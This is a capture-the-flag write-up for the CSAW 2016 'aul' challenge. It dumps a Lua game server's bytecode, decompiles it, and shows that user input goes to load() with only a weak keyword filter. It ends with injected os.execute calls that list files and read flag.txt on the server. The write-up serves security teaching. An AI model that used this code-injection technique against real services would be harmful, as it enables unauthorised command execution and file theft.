Rating:

# CSAW CTF 2016 aul (100) Writeup

> Wow, this looks like an aul-ful game. I think there is a flag around here somewhere...
>
> `nc pwn.chal.csaw.io 8001`

This challenge doesn't provide any file to analyze but only a target service to connect to.

After connecting, you'll be presented with something which looks like a game:

```
let's play a game
| 0 0 0 0 0 0 0 0 |
| 0 1 0 0 0 0 4 0 |
| 0 3 2 2 4 1 4 4 |
| 0 3 2 3 2 3 4 3 |
| 4 b 2 2 4 4 3 4 |
| 3 2 4 4 1 1 2 2 |
| 3 3 c d 3 3 2 3 |
| 3 2 1 4 4 a 2 4 |
```

After trying some commands it sends a hint which commands are available:

```
Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.
```

As we clearly need some help on this game, let's ask for:

```
LuaS?�
?
xV(w@????�,��,�,��,�,@��,��,���,�„,@��,��,���?�CA�?$@??@C$@�&�??
make_board?populate_board?board_tostring?fall?rotate??crush?
rotate_leftreadAll?help?quit??exit? run_step?game?
writeline??let's play a game
??
?
???K@J��@@��
AF�@
setmetatable???A?��J�?�@�f?&�??size?
__tostring?board_tostring????"?
.�@�?��?A@�@?@??$A?b@?����?�@?RA?,? @��?@�F�A�??��????AB?��?�A?d????���??���
@?i����A�?���?h�?�@??d���?C�BC�??��?
��?g��F�C�?e??f?&�?size?math?
?F@G@�����?d�?��F??��?@�&?&�??math?random???????$/?!K�@�@�@?A���?���?BN�@?��(B?�?�?A???�����?݁??'?�?BA�A?@?��?�?��?��?$B�?����@A��??�AA?��?�&�
?size?????|?? ??table?insert?? |?concat??
?1D?
?G@�@@��?����?�?�N?��??(��?�?@?�?$B?'���?&�?size?
make_board??????5=?EN�� @?�@?���?��?�?�??���_@@???��?��??�?���?�?�?�����??N����&�?????������??OC?MÂ?GC?�@??'?��@��?&�??size?���΁�??�N����(B?�C�
make_board????Ug?
$G@�@@��?����?�??�A??�A?��?�@??�N����?(A��?��?'?�?�OA�N��?��?(A?�B�???G�?GB�??@???@����??@��?��?'?��?&?size?
make_board???a??b??c??d???ik? F@�@�@?�?�ef&�??rotate?mr?
F@G@����d��?���???���?�@��@?�?&�???io?open??rb?read?*all??close?tx?@@@F�@��d�?�?$��?F@A��@ǀ�??�?d@&�?string??subreadAll?
server.luac??? writeraw??len?{}?@@�&�??quit???�?-F@d���@@��@?����??�@??���A�@���?�@@�@A?��?�?���?�?@���?�@@�@A?��?�?���?�?@���?�B�@??���?��?���?�B??@���?�??�?�&�
? readline?string??len??exit?find? function??print?loadreturn ?��?%?@F@@��d?$�F�@�A���?�@?��?d@?F�A�d�?��A�@?@?�_�?@?���@BƀB?AB@?$??���??����@��?�@?��?�&�
?populate_board?
make_board?
writeline?board_tostring??
? run_step?quit?fall??crush?EDidn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.
?Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.
```

or in hex:

```
00000000: 4c75 6153 0019 930d 0d0a 1a0d 0a04 0804 LuaS............
00000010: 0808 7856 0000 0000 0000 0000 0000 0028 ..xV...........(
00000020: 7740 0100 0000 0000 0000 0000 0002 021f w@..............
00000030: 0000 002c 0000 0008 0000 802c 4000 0008 ...,.......,@...
00000040: 0080 802c 8000 0008 0000 812c c000 0008 ...,.......,....
00000050: 0080 812c 0001 0008 0000 822c 4001 0008 ...,.......,@...
00000060: 0080 822c 8001 0008 0000 832c c001 0008 ...,.......,....
00000070: 0080 832c 0002 0008 0000 8408 80c2 842c ...,...........,
00000080: 4002 0008 0080 852c 8002 0008 0000 862c @......,.......,
00000090: c002 0008 0080 8606 8043 0041 c003 0024 .........C.A...$
000000a0: 4000 0106 4043 0024 4080 0026 0080 0010 @...@C.$@..&....
000000b0: 0000 0004 0b6d 616b 655f 626f 6172 6404 .....make_board.
000000c0: 0f70 6f70 756c 6174 655f 626f 6172 6404 .populate_board.
000000d0: 0f62 6f61 7264 5f74 6f73 7472 696e 6704 .board_tostring.
000000e0: 0566 616c 6c04 0772 6f74 6174 6504 0663 .fall..rotate..c
000000f0: 7275 7368 040c 726f 7461 7465 5f6c 6566 rush..rotate_lef
00000100: 7404 0872 6561 6441 6c6c 0405 6865 6c70 t..readAll..help
00000110: 0405 7175 6974 0100 0405 6578 6974 0409 ..quit....exit..
00000120: 7275 6e5f 7374 6570 0405 6761 6d65 040d run_step..game..
00000130: 0a77 7269 7465 6c69 6e65 0413 6c65 7427 .writeline..let'
00000140: 7320 706c 6179 2061 2067 616d 650d 0a01 s play a game...
00000150: 0000 0001 000c 0000 0000 0300 0000 0c00 ................
00000160: 0000 0100 0611 0000 004b 4000 004a 0000 .........K@..J..
00000170: 8086 4040 00c0 0080 000b 4100 0046 c140 ..@@......A..F.@
00000180: 000d 0a41 0181 a440 8001 8100 0100 cf00 ...A...@........
00000190: 0000 ce40 c101 0141 0100 a800 0080 4a00 ...@...A......J.
000001a0: c102 a740 ff7f 6600 0001 2600 8000 0600 ...@..f...&.....
000001b0: 0000 0405 7369 7a65 040d 7365 746d 6574 ....size..setmet
000001c0: 6174 6162 6c65 040b 5f5f 746f 7374 7269 atable..__tostri
000001d0: 6e67 040f 626f 6172 645f 746f 7374 7269 ng..board_tostri
000001e0: 6e67 1300 0000 0000 0000 0013 0100 0000 ng..............
000001f0: 0000 0000 0100 0000 0000 0000 0000 0000 ................
00000200: 0000 0000 0000 0000 0000 000e 0000 0022 ..............."
00000210: 0000 0003 000c 2e00 0000 c700 4000 a200 ............@...
00000220: 0000 1ec0 0080 0641 4000 0781 4002 4001 .......A@...@.@.
00000230: 0001 2441 0001 6240 0000 1e80 0080 0fc1 ..$A..b@........
00000240: 8001 0fc1 4002 5200 4102 2c01 0000 2040 ....@.R.A.,... @
00000250: 8082 1e40 0780 4681 4100 8b01 0002 c1c1 ...@..F.A.......
00000260: 0100 0102 0200 4142 0200 8182 0200 ab41 ......AB.......A
00000270: 0002 6401 0101 1e80 0080 8002 0002 a482 ..d.............
00000280: 8000 0d0a 4002 0569 8100 00ea 81fe 7f41 ....@..i.......A
00000290: c102 008e 01c1 00c1 c102 0068 8101 8040 ...........h...@
000002a0: 0200 0264 8280 0086 0243 0087 4243 05c1 ...d.....C..BC..
000002b0: 0201 00a4 8200 010d 0a80 8204 67c1 fd7f ............g...
000002c0: 4681 4300 8001 0000 6501 0001 6601 0000 F.C.....e...f...
000002d0: 2600 8000 0f00 0000 0405 7369 7a65 0405 &.........size..
000002e0: 6d61 7468 040b 7261 6e64 6f6d 7365 6564 math..randomseed
000002f0: 1303 0000 0000 0000 0013 0400 0000 0000 ................
00000300: 0000 1300 0000 0000 0000 0004 0769 7061 .............ipa
00000310: 6972 7304 0261 0402 6204 0263 0402 6413 irs..a..b..c..d.
00000320: 0100 0000 0000 0000 0405 6d61 7468 0407 ..........math..
00000330: 7261 6e64 6f6d 0405 6661 6c6c 0100 0000 random..fall....
00000340: 0000 0100 0000 0013 0000 0017 0000 0000 ................
00000350: 0004 0d00 0000 0400 0000 4600 4000 4740 ..........F.@.G@
00000360: c000 8500 8000 c500 8000 8fc0 0001 6480 ..............d.
00000370: 0001 0e80 c000 4600 0001 1fc0 c000 1e40 ......F........@
00000380: fd7f 2600 0001 2600 8000 0400 0000 0405 ..&...&.........
00000390: 6d61 7468 0407 7261 6e64 6f6d 1301 0000 math..random....
000003a0: 0000 0000 0013 0000 0000 0000 0000 0300 ................
000003b0: 0000 0000 0103 0100 0000 0000 0000 0000 ................
000003c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000003d0: 0000 0000 0024 0000 002f 0000 0001 000f .....$.../......
000003e0: 2100 0000 4b00 0000 8700 4000 c140 0000 !...K.....@..@..
000003f0: 0e81 4001 4181 0000 e880 0480 c1c1 0000 ..@.A...........
00000400: 0142 0000 4e82 4001 8182 0000 2842 0180 .B..N.@.....(B..
00000410: 0003 8003 4103 0100 8f83 0003 8d83 8305 ....A...........
00000420: 8783 0300 dd81 0306 2702 fe7f 0642 4100 ........'....BA.
00000430: 0782 4104 4002 8000 8002 8003 c1c2 0100 ..A.@...........
00000440: 9dc2 0205 2442 8001 e7c0 fa7f c640 4100 ....$B.......@A.
00000450: c700 c201 0001 8000 4141 0200 e500 8001 ........AA......
00000460: e600 0000 2600 8000 0d0a 0000 0004 0573 ....&..........s
00000470: 697a 6513 0000 0000 0000 0000 1301 0000 ize.............
00000480: 0000 0000 0004 027c 0402 2004 0674 6162 .......|.. ..tab
00000490: 6c65 0407 696e 7365 7274 0403 207c 0407 le..insert.. |..
000004a0: 636f 6e63 6174 0402 0d0a 0100 0000 0000 concat..........
000004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000004c0: 0031 0000 0044 0000 0001 000d 0a10 0000 .1...D..........
000004d0: 0047 0040 0086 4040 00c0 0080 0001 8100 .G.@..@@........
000004e0: 00a4 8080 01ec 0000 0001 c100 004e 01c1 .............N..
000004f0: 0081 0101 0028 8100 8000 0280 0140 0280 .....(.......@..
00000500: 0324 4200 0127 c1fe 7fa6 0000 0126 0080 .$B..'.......&..
00000510: 0005 0000 0004 0573 697a 6504 0b6d 616b .......size..mak
00000520: 655f 626f 6172 6413 0000 0000 0000 0000 e_board.........
00000530: 1300 0000 0000 0000 0013 0100 0000 0000 ................
00000540: 0000 0100 0000 0000 0100 0000 0035 0000 .............5..
00000550: 003d 0000 0001 0008 1800 0000 4500 0000 .=..........E...
00000560: 4e00 c000 8500 0000 8e00 4001 c140 0000 N.........@..@..
00000570: 0181 0000 a880 0380 8501 0000 8f81 8102 ................
00000580: 8d01 0003 8681 8100 5f40 4003 1e00 0280 ........_@@.....
00000590: 8501 0000 8f81 8100 8d01 0003 c501 0000 ................
000005a0: cfc1 8102 cd01 8003 c6c1 8100 88c0 0103 ................
000005b0: 4e00 c000 a7c0 fb7f 2600 8000 0300 0000 N.......&.......
000005c0: 1301 0000 0000 0000 0013 0000 0000 0000 ................
000005d0: 0000 13ff ffff ffff ffff ff03 0000 0001 ................
000005e0: 0101 0001 0200 0000 0000 0000 0000 0000 ................
000005f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000600: 0000 4600 0000 5300 0000 0100 0e19 0000 ..F...S.........
00000610: 0047 0040 0086 4040 00c0 0080 0001 8100 .G.@..@@........
00000620: 00a4 8080 01c1 8000 000e c1c0 0041 c100 .............A..
00000630: 00e8 0003 80ce c1c0 00ce 8181 0301 8200 ................
00000640: 004e c2c0 0081 c200 0028 4201 800f 4380 .N.......(B...C.
00000650: 050d c301 064f 4300 034d c382 0647 4303 .....OC..M...GC.
00000660: 008a 4003 0627 02fe 7fe7 40fc 7fa6 0000 ..@..'....@.....
00000670: 0126 0080 0004 0000 0004 0573 697a 6504 .&.........size.
00000680: 0b6d 616b 655f 626f 6172 6413 0000 0000 .make_board.....
00000690: 0000 0000 1301 0000 0000 0000 0001 0000 ................
000006a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000006b0: 0000 0000 5500 0000 6700 0000 0100 0d0a ....U...g.......
000006c0: 2400 0000 4700 4000 8640 4000 c000 8000 $...G.@..@@.....
000006d0: 0181 0000 a480 8001 cb00 0002 01c1 0000 ................
000006e0: 4101 0100 8141 0100 c181 0100 eb40 0002 A....A.......@..
000006f0: 0181 0000 4ec1 c100 81c1 0100 2841 0080 ....N.......(A..
00000700: 07c2 0100 8a00 8203 2701 ff7f 0001 8000 ........'.......
00000710: 4f41 8000 4ec1 c102 81c1 0100 2841 0280 OA..N.......(A..
00000720: 0e42 8003 0702 0200 47c2 0100 4742 8201 .B......G...GB..
00000730: 1f40 0204 1e40 0080 8a80 c003 1e40 0080 .@...@.......@..
00000740: 07c2 0100 8a00 8203 2701 fd7f a600 0001 ........'.......
00000750: 2600 8000 0800 0000 0405 7369 7a65 040b &.........size..
00000760: 6d61 6b65 5f62 6f61 7264 1300 0000 0000 make_board......
00000770: 0000 0004 0261 0402 6204 0263 0402 6413 .....a..b..c..d.
00000780: 0100 0000 0000 0000 0100 0000 0000 0000 ................
00000790: 0000 0000 0000 0000 0000 0000 0000 0069 ...............i
000007a0: 0000 006b 0000 0001 0005 0900 0000 4600 ...k..........F.
000007b0: 4000 8600 4000 c600 4000 0001 0000 e400 @...@...@.......
000007c0: 0001 a400 0000 6500 0000 6600 0000 2600 ......e...f...&.
000007d0: 8000 0100 0000 0407 726f 7461 7465 0100 ........rotate..
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 006d 0000 0072 0000 0001 0005 .....m...r......
00000800: 0c00 0000 4600 4000 4740 c000 8000 0000 ....F.@.G@......
00000810: c180 0000 6480 8001 8cc0 c000 0101 0100 ....d...........
00000820: a480 8001 cc40 c100 e440 0001 a600 0001 .....@...@......
00000830: 2600 8000 0600 0000 0403 696f 0405 6f70 &.........io..op
00000840: 656e 0403 7262 0405 7265 6164 0405 2a61 en..rb..read..*a
00000850: 6c6c 0406 636c 6f73 6501 0000 0000 0000 ll..close.......
00000860: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000870: 7400 0000 7800 0000 0000 050f 0000 0006 t...x...........
00000880: 0040 0007 4040 0046 8040 0081 c000 0064 .@..@@.F.@.....d
00000890: 8000 0181 0001 0024 8080 0146 4041 0080 .......$...F@A..
000008a0: 0000 00c6 0040 00c7 80c1 0100 0100 00e4 .....@..........
000008b0: 0000 0164 4000 0026 0080 0007 0000 0004 ...d@..&........
000008c0: 0773 7472 696e 6704 0473 7562 0408 7265 .string..sub..re
000008d0: 6164 416c 6c04 0c73 6572 7665 722e 6c75 adAll..server.lu
000008e0: 6163 1302 0000 0000 0000 0004 0977 7269 ac...........wri
000008f0: 7465 7261 7704 046c 656e 0100 0000 0000 teraw..len......
00000900: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000910: 007b 0000 007d 0000 0000 0002 0200 0000 .{...}..........
00000920: 0840 4080 2600 8000 0200 0000 0405 7175 .@@.&.........qu
00000930: 6974 0101 0100 0000 0000 0000 0000 0000 it..............
00000940: 0000 0000 0000 0000 0000 007f 0000 0097 ................
00000950: 0000 0001 0005 2d00 0000 4600 4000 6480 ......-...F.@.d.
00000960: 8000 8640 4000 8780 4001 c000 8000 a480 ...@@...@.......
00000970: 0001 1fc0 4001 1ec0 0080 8600 4100 a440 ....@.......A..@
00000980: 8000 8400 0000 a600 0001 8640 4000 8740 ...........@@..@
00000990: 4101 c000 8000 0181 0100 a480 8001 a200 A...............
000009a0: 0000 1e40 0080 8400 0000 a600 0001 8640 ...@...........@
000009b0: 4000 8740 4101 c000 8000 01c1 0100 a480 @..@A...........
000009c0: 8001 a200 0000 1e40 0080 8400 0000 a600 .......@........
000009d0: 0001 8600 4200 c140 0200 0001 8000 dd00 ....B..@........
000009e0: 8101 a480 0001 a480 8000 1f80 4201 1e40 ............B..@
000009f0: 0080 c400 0000 e600 0001 c000 0001 0001 ................
00000a00: 0000 e500 0001 e600 0000 2600 8000 0b00 ..........&.....
00000a10: 0000 0409 7265 6164 6c69 6e65 0407 7374 ....readline..st
00000a20: 7269 6e67 0404 6c65 6e13 0000 0000 0000 ring..len.......
00000a30: 0000 0405 6578 6974 0405 6669 6e64 0409 ....exit..find..
00000a40: 6675 6e63 7469 6f6e 0406 7072 696e 7404 function..print.
00000a50: 056c 6f61 6404 0872 6574 7572 6e20 0001 .load..return ..
00000a60: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000a70: 0000 0000 0000 9900 0000 ae00 0000 0000 ................
00000a80: 0625 0000 0006 0040 0046 4040 0081 8000 .%.....@.F@@....
00000a90: 0064 0000 0124 8000 0046 c040 0086 0041 .d...$...F.@...A
00000aa0: 00c0 0000 00a4 8000 01c1 4001 009d c000 ..........@.....
00000ab0: 0164 4000 0146 8041 0080 0000 0064 8000 .d@..F.A.....d..
00000ac0: 0186 c041 00a2 4000 001e 4004 805f 00c2 ...A..@...@.._..
00000ad0: 001e 4002 8000 0080 0086 4042 00c6 8042 ..@.......@B...B
00000ae0: 0006 4142 0040 0100 0024 0100 01e4 0000 ..AB.@...$......
00000af0: 00a4 8000 0000 0000 011e 8000 8086 c040 ...............@
00000b00: 00c1 c002 00a4 4000 0183 0000 00a2 0000 ......@.........
00000b10: 001e 00f8 7f26 0080 000c 0000 0004 0f70 .....&.........p
00000b20: 6f70 756c 6174 655f 626f 6172 6404 0b6d opulate_board..m
00000b30: 616b 655f 626f 6172 6413 0800 0000 0000 ake_board.......
00000b40: 0000 040d 0a77 7269 7465 6c69 6e65 040f .....writeline..
00000b50: 626f 6172 645f 746f 7374 7269 6e67 0402 board_tostring..
00000b60: 0d0a 0409 7275 6e5f 7374 6570 0405 7175 ....run_step..qu
00000b70: 6974 0004 0566 616c 6c04 0663 7275 7368 it...fall..crush
00000b80: 1445 4469 646e 2774 2075 6e64 6572 7374 .EDidn't underst
00000b90: 616e 642e 2054 7970 6520 2772 6f74 6174 and. Type 'rotat
00000ba0: 6527 2c20 2772 6f74 6174 655f 6c65 6674 e', 'rotate_left
00000bb0: 272c 2027 6578 6974 272c 206f 7220 2768 ', 'exit', or 'h
00000bc0: 656c 7027 2e0d 0a01 0000 0000 0000 0000 elp'............
00000bd0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000be0: 0000 0000 0000 0000 00 .........
```

This gibberish seem to be some lua compiled bytecode. Trying to decompile it with unluac fails as it complains about a missing lua header. After looking into the source code of unluac, we'll see how a header should look [like](https://github.com/viruscamp/unluac/blob/master/src/unluac/parse/BHeader.java#L13).

After prepending a byte with the value `0x1b` we are able to pass the magic check. But the decompiling still fails with errors.
If you look carefully, you'll notice that new lines (`\n`, `0a`) never occur alone, but instead as `\r\n` (`0d 0a`). So let's try
to convert them. This time we are lucky and are able to decompile the bytecode:
```lua
function make_board(A0_0)
local L1_1
L1_1 = {}
L1_1.size = A0_0
setmetatable(L1_1, {
__tostring = board_tostring
})
for _FORV_5_ = 0, A0_0 * A0_0 - 1 do
L1_1[_FORV_5_] = 0
end
return L1_1
end
function populate_board(A0_2, A1_3, A2_4)
local L3_5, L4_6
L3_5 = A0_2.size
if A2_4 then
L4_6 = math
L4_6 = L4_6.randomseed
L4_6(A2_4)
end
if not A1_3 then
L4_6 = L3_5 * L3_5
L4_6 = L4_6 * 3
A1_3 = L4_6 / 4
end
function L4_6()
repeat
until A0_2[math.random(L3_5 * L3_5) - 1] == 0
return math.random(L3_5 * L3_5) - 1
end
if A1_3 > 0 then
for _FORV_8_, _FORV_9_ in ipairs({
"a",
"b",
"c",
"d"
}) do
A0_2[L4_6()] = _FORV_9_
end
for _FORV_8_ = 1, A1_3 - 4 do
A0_2[L4_6()] = math.random(4)
end
return fall(A0_2)
end
end
function board_tostring(A0_7)
local L1_8, L2_9, L3_10, L4_11, L5_12, L6_13, L7_14
L1_8 = {}
L2_9 = A0_7.size
for L6_13 = 0, L2_9 - 1 do
L7_14 = "|"
for _FORV_11_ = 0, L2_9 - 1 do
L7_14 = L7_14 .. " " .. A0_7[_FORV_11_ + L6_13 * L2_9]
end
_FOR_.insert(L1_8, L7_14 .. " |")
end
return L3_10(L4_11, L5_12)
end
function fall(A0_15)
local L1_16, L2_17, L3_18, L4_19, L5_20, L6_21, L7_22
L1_16 = A0_15.size
L2_17 = make_board
L3_18 = L1_16
L2_17 = L2_17(L3_18, L4_19)
function L3_18(A0_23)
local L1_24, L3_25, L4_26, L5_27, L6_28, L7_29
L1_24 = L1_16
L1_24 = L1_24 - 1
for L6_28 = L3_25 - 1, 0, -1 do
L7_29 = L1_16
L7_29 = L6_28 * L7_29
L7_29 = L7_29 + A0_23
L7_29 = A0_15[L7_29]
if L7_29 ~= 0 then
L7_29 = L1_16
L7_29 = L1_24 * L7_29
L7_29 = L7_29 + A0_23
L2_17[L7_29] = A0_15[L6_28 * L1_16 + A0_23]
L1_24 = L1_24 - 1
end
end
end
for L7_22 = 0, L1_16 - 1 do
L3_18(L7_22)
end
return L2_17
end
function rotate(A0_30)
local L1_31
L1_31 = A0_30.size
for _FORV_6_ = 0, L1_31 - 1 do
for _FORV_11_ = 0, L1_31 - 1 do
make_board(L1_31, 0)[_FORV_11_ * L1_31 + (L1_31 - 1 - _FORV_6_)] = A0_30[_FORV_6_ * L1_31 + _FORV_11_]
end
end
return (make_board(L1_31, 0))
end
function crush(A0_32)
local L1_33
L1_33 = A0_32.size
for _FORV_7_ = 0, L1_33 - 1 do
make_board(L1_33, 0)[_FORV_7_] = A0_32[_FORV_7_]
end
for _FORV_7_ = L1_33, L1_33 * L1_33 - 1 do
if A0_32[_FORV_7_ - L1_33] == ({
"a",
"b",
"c",
"d"
})[A0_32[_FORV_7_]] then
make_board(L1_33, 0)[_FORV_7_] = 0
else
make_board(L1_33, 0)[_FORV_7_] = A0_32[_FORV_7_]
end
end
return (make_board(L1_33, 0))
end
function rotate_left(A0_34)
local L1_35, L2_36
L1_35 = rotate
L2_36 = rotate
L2_36 = L2_36(rotate(A0_34))
return L1_35(L2_36, L2_36(rotate(A0_34)))
end
function readAll(A0_37)
io.open(A0_37, "rb"):close()
return (io.open(A0_37, "rb"):read("*all"))
end
function help()
local L0_38
L0_38 = string
L0_38 = L0_38.sub
L0_38 = L0_38(readAll("server.luac"), 2)
writeraw(L0_38, string.len(L0_38))
end
quit = false
function exit()
local L0_39, L1_40
quit = true
end
function run_step(A0_41)
local L1_42, L2_43
L1_42 = readline
L1_42 = L1_42()
L2_43 = string
L2_43 = L2_43.len
L2_43 = L2_43(L1_42)
if L2_43 == 0 then
L2_43 = exit
L2_43()
L2_43 = nil
return L2_43
end
L2_43 = string
L2_43 = L2_43.find
L2_43 = L2_43(L1_42, "function")
if L2_43 then
L2_43 = nil
return L2_43
end
L2_43 = string
L2_43 = L2_43.find
L2_43 = L2_43(L1_42, "print")
if L2_43 then
L2_43 = nil
return L2_43
end
L2_43 = load
L2_43 = L2_43("return " .. L1_42)
L2_43 = L2_43()
if L2_43 == nil then
return nil
end
return L2_43(A0_41)
end
function game()
local L0_44
L0_44 = populate_board
L0_44 = L0_44(make_board(8))
repeat
writeline(board_tostring(L0_44) .. "\n")
if not quit then
if run_step(L0_44) ~= nil then
L0_44 = run_step(L0_44)
L0_44 = fall(crush(fall(L0_44)))
else
writeline("Didn't understand. Type 'rotate', 'rotate_left', 'exit', or 'help'.\n")
end
end
until false
end
writeline("let's play a game\n")
game()
```

The interesting function in this case is the `run_step` one. As you may notice, there is no comparisons for the available commands
(`help`, `rotate`, `rotate_left`, `exit`), but instead there are functions available which are named liked this. Additionally, the
`run_step` function checks our input if it contains the strings `function` or `print`. If you look carefully at the line ``L2_43 = load`` and the follow ups, you may see that we can reduce them to the following:
```lua
load("return " .. L1_42)()
```

This means that our input (stored in the variable `L1_42`) is placed after a return statement and interpreted. This would create an
anonymous function which is afterwards called to return a reference to the function which is named after the entered command.

Our goal is to inject our own code to gain the flag (typically stored in a file near the executable). This means that we can try to
execute system commands (`os.execute`). Guess what, it works :)

```lua
os.execute("ls")
```
to get the filename of the flag and
```lua
os.execute("cat flag.txt")
```
to get the flag.

Original writeup (https://github.com/ernw/ctf-writeups/tree/master/csaw2016/aul).